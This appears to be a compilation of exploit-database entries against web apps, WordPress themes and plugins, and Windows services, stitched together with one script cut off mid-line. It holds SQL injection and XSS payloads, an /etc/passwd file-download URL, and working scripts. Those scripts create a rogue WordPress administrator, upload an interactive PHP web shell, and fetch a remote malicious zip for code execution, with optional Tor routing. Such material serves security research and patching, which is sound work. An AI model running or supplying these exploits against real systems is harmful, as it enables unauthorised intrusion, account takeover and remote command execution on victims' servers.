# Software Link: https://codecanyon.net/item/worksuite-project-management-system/20052522
# Version: v2.4
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Worksuite is a project management software written in Laravel 5.4 (PHP Framework) which is specifically developed for freelancers and SMEs (Small/Medium sized enterprises). You can manage your company's daily work, your employee's tasks, keep a track on project's progress and much more. It is designed with latest security and code standards.
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern : %27 RLIKE (case when 5021001=5021001 then 0x454d49524f474c55 else 0x28 end) and '7917'='7917
# POST Method :
http://localhost/worksuite24/public/login^_token=1knO8SR8Erjg56Mza4VaEv1Mb9lj5HiJBPmbTnFx&password=3115065[SQLINJECT HERE]
===========================================================================================
# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 06-16-2021
# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html
# Software Links : https://getwsone.com/
# Tested Version: 20.3.8.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
VMware Hub Health Monitoring Service VMware Hub Health Monitoring Service C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe Auto
C:\>sc qc "VMware Hub Health Monitoring Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: VMware Hub Health Monitoring Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : VMware Hub Health Monitoring Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
source: https://www.securityfocus.com/bid/54812/info
Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Review: Add Comments - Listing
<div class="addComment">
<h1>Reply to The Comment</h1>
<div class="pageDescription">
<div class="commentInfo">You are replying to the comment
#"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])'
<="" to=""
listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
<span class="fieldValue fieldValueMake">Acura</span>
1.2
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired
user inter action.
Fo demonstration or reproduce ...
String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <
Dealer > Search Sellers > City
PoC:
http://www.example.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search
Browse by Make and Model / AC Cobra / >
PoC:
http://www.example.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/
Comments > Reply to The Comment > Topic & Text (commentSid)
PoC:
http://www.example.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
# Exploit Title: Workout Journal App 1.0 - Stored XSS
# Date: 12.01.2024
# Exploit Author: MURAT CAGRI ALIS
# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html>
# Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows / MacOS / Linux
# CVE : CVE-2024-24050
# Description
Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php url
For the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.
# PoC
Register Request to /workout-journal/endpoints/add-user.php
POST /workout-journal/endpoint/add-user.php HTTP/1.1
Host: localhost
Content-Length: 268
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci
Connection: close
first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-
This request turn back 200 Code on Response
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:05:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Content-Length: 214
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
alert('Account Registered Successfully!');
window.location.href = 'http://localhost/workout-journal/';
</script>
After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right.
/workout-journal/home.php Request
GET /workout-journal/home.php HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/endpoint/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1
Connection: close
/workout-journal/home.php Response
HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:07:56 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Workout Journal App</title>
<!-- Style CSS -->
<link rel="stylesheet" href="./assets/style.css">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">
<style>
body {
overflow: hidden;
}
</style>
</head>
<body>
<div class="main">
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand ml-3" href="#">Workout Journal App</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto">
<li class="nav-item active">
<a class="nav-link" href="./endpoint/logout.php">Log Out</a>
</li>
</div>
</nav>
<div class="landing-page-container">
<div class="heading-container">
<h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>
<p>What would you like to do today?</p>
</div>
<div class="select-option">
<div class="read-journal" onclick="redirectToReadJournal()">
<img src="./assets/read.jpg" alt="">
<p>Read your past workout journals.</p>
</div>
<div class="write-journal" onclick="redirectToWriteJournal()">
<img src="./assets/write.jpg" alt="">
<p>Write your todays journal.</p>
</div>
</div>
</div>
</div>
<!-- Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>
<!-- Script JS -->
<script src="./assets/script.js"></script>
</body>
</html>
# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection
# Date: Sep 22, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
# Version: 0.1.0
# Tested on: Linux
# Auth Bypass:
username:' or '1'='1
password:' or '1'='1
#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql
# POST Requests:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT
COUNT(*),CONCAT(0x7170627071,(SELECT
(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM
(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/
Parameter: #2* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT
COUNT(*),CONCAT(0x7170627071,(SELECT
(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/
# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Softalk
# Version : 7.5.1
# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3
# Tested on Windows 10
# CVE : N/A
c:\>sc qc WorkgroupMail
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WorkgroupMail
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WorkgroupMail
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
# Exploit Author: Al Baradi Joy
# Date: 2025-04-07
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link:
https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
# Version: <= 4.1.1
# Tested on: WordPress 6.4.3
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-269
# References:
# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2025-2563
import re
import json
import requests
import random
import string
from urllib.parse import urljoin
def banner():
print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
print("[+] Made By Al Baradi Joy\n")
def randstring(n=8):
return ''.join(random.choices(string.ascii_lowercase, k=n))
def get_regex(content, pattern, group=1, name=""):
match = re.search(pattern, content)
if not match:
raise ValueError(f"[-] Could not extract {name} (Pattern:
{pattern})")
return match.group(group)
def exploit(target):
session = requests.Session()
username = randstring()
password = randstring() + "!@"
email = f"{username}@exploit.test"
try:
print("[+] Getting registration page...")
r = session.get(urljoin(target, "/membership-registration/"),
timeout=10)
r.raise_for_status()
page = r.text
nonce = get_regex(page,
r'"user_registration_form_data_save":"(.*?)"', name="nonce")
formid = get_regex(page, r"id='user-registration-form-([0-9]+)'",
name="formid")
memval = get_regex(page,
r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
memname = get_regex(page,
r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
front_nonce = get_regex(page, r'name="ur_frontend_form_nonce"
value="(.*?)"', name="frontend_nonce")
loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data
= {"_nonce":"(.*?)"', name="localized_frontend_nonce")
print("[+] Submitting registration form...")
form_data = [
{"field_name": "user_login", "value": username, "field_type":
"text", "label": "Username"},
{"field_name": "user_email", "value": email, "field_type":
"email", "label": "User Email"},
{"field_name": "user_pass", "value": password, "field_type":
"password", "label": "User Password"},
{"field_name": "user_confirm_password", "value": password,
"field_type": "password", "label": "Confirm Password"},
{"value": memval, "field_type": "radio", "label": "membership",
"field_name": f"membership_field_{memname}"}
]
payload = {
"action": "user_registration_user_form_submit",
"security": nonce,
"form_data": json.dumps(form_data),
"form_id": formid,
"registration_language": "en-US",
"ur_frontend_form_nonce": front_nonce,
"is_membership_active": memval,
"membership_type": memval
}
r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
data=payload, timeout=10)
if '"success":true' not in r2.text:
print("[-] Registration form failed.")
return
print("[+] Sending membership registration as administrator...")
member_payload = {
"action": "user_registration_membership_register_member",
"security": loc_nonce,
"members_data": json.dumps({
"membership": "1",
"payment_method": "free",
"start_date": "2025-3-29",
"username": username,
"role": "administrator"
})
}
r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
data=member_payload, timeout=10)
if '"success":true' in r3.text:
print("[+] Exploit Successful!")
print(f"[+] Admin Username: {username}")
print(f"[+] Admin Password: {password}")
else:
print("[-] Membership escalation failed.")
except Exception as e:
print(f"[-] Exploit failed: {str(e)}")
if __name__ == "__main__":
banner()
target = input("Enter target WordPress site (e.g., http://example.com):
").strip().rstrip('/')
if not target.startswith("http"):
target = "http:
# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Version: 5.3.5
# Tested on: Windows10
# CVE: CVE-2024-33559
Poc
<https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc>
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
source: https://www.securityfocus.com/bid/56691/info
The Wp-ImageZoom theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/wp-imagezoom/zoom.php?id=[SQL]
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499
import requests
import random
import string
import sys
def usage():
banner = '''
NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
usage: python3 Workreap_rce.py <URL>
example for linux : python3 Workreap_rce.py https://www.exploit-db.com
example for Windows : python Workreap_rce.py https://www.exploit-db.com
'''
print(f"{BOLD}{banner}{ENDC}")
def upload_file(target):
print("[ ] Uploading File")
url = target + "/wp-admin/admin-ajax.php"
body = "<?php echo '" + random_str + "';?>"
data = {"action": "workreap_award_temp_file_uploader"}
response = requests.post(url, data=data, files={"award_img": (file_name, body)})
if '{"type":"success",' in response.text:
print(f"{GREEN}[+] File uploaded successfully{ENDC}")
check_php_file(target)
else:
print(f"{RED}[+] File was not uploaded{ENDC}")
def check_php_file(target):
response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)
if random_str in response_2.text:
print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)
question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
if question == "y" or question == "Y":
print("[ ] Uploading Shell ")
get_rce(target)
else:
usage()
else:
print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")
def get_rce(target):
file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
data = {"action": "workreap_award_temp_file_uploader"}
response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})
print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
while True:
command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")
response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")
print(f"{GREEN}{response_4.text}{ENDC}")
if __name__ == "__main__":
global GREEN , RED, YELLOW, BOLD, ENDC
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BOLD = '\033[1m'
ENDC = '\033[0m'
file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
try:
upload_file(sys.argv[1])
except IndexError:
usage()
except requests.exceptions.RequestException as e:
print("\nPlease Enter Valid Address")
# Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: http://demo.themeftc.com/wibar
# Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798
# Version: 1.1.8
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge
The WordPress theme contains Brands feature which is vulnerable to stored
cross site scripting. The logo URL parameter is vulnerable to cross site
scripting. The following vector was used for testing XSS: "><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>.
In order to reproduce the vulnerability, please follow the next steps:
1. Log in as editor/administrator/contributor/author:
https://website.com/wp-admin
2. Go to Brands section
3. Click add new brand and add a custom brand title
4. The vulnerable parameter is: Logo URL / <input type="text"
name="ftc_brand_url" id="ftc_brand_url" value="">
5. Add the following payload: "><script
src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where
base64 == alert(document.domain)
6. Publish
7. The alert will pop up when a user will visit the website on
https://website.com/brand/vulnerablebrand.
Evidence:
1. https://ibb.co/1fpYJWN
2. https://ibb.co/S7j5Sgd
C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High
# Exploit Title: Wordpress White-Label Framework XSS
# Google Dork: inurl:/wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
# Date: 7 September 2015
# Exploit Author: Outlasted
# Software Link: wordpress.com / http://whitelabelframework.com/
# Version: 2.0.6
#Greetz to: TeaMp0isoN
=====================================================
Vulnerable url: /wp-content/themes/whitelabel-framework/inc/form-sharebymail_iframe.php
=====================================================
How to exploit?
----------------------------------------------------------------------------------------------------------
Enter your XSS payload in all forms and watch the magic.
source: https://www.securityfocus.com/bid/49874/info
The Web Minimalist theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Web Minimalist theme 1.4 are vulnerable.
http://www.example.com/wp/index.php/[XSS]
source: https://www.securityfocus.com/bid/69670/info
Urban City theme for Wordpress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
<?php
/**
* Exploit Title: Uncode WP Theme RCE Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage:
* Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220
* Version: 1.3.0 possible 1.3.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: RCE, Arbirary file UPLOAD, (Low Authenticated )
* Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:u:p:f:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
echo "Generateing payload.\n";
$data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);
echo "Sending payload\n";
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Eco response: ".$resp."\n";
$resp = json_decode($resp,true);
if ($resp['success'] === 'Font downloaded and extracted successfully.'){
echo "Response ok, calling RCE\n";
$file_path = parse_url($options['f']);
$remote_file_info = pathinfo($file_path['path']);
$zip_file_name = $remote_file_info['basename'];
$zip_file_name_php = str_replace('.zip', '.php', $zip_file_name);
$url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;
echo 'Url: '. $url."\n";
//POC Test mode
if ($file_path['host'] == 'wp0day.com'){
echo "Exploit test mode on\n";
$rnd = rand();
echo "Rand $rnd, MD5: ".md5($rnd)."\n";
$url = $url . '?poc='.$rnd;
}
$curl->get($url);
echo "RCE Response:";
echo $curl->getResponse()."\n\n";
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if ( !isset($options['f']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Uncode WP Theme RCE Expoit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -f [URL]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[URL] It must be ZIP file. It gets unzipped into /wp-content/uploads/uncode-fonts/[some.zip]/files folder
Example: rce.php -> zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}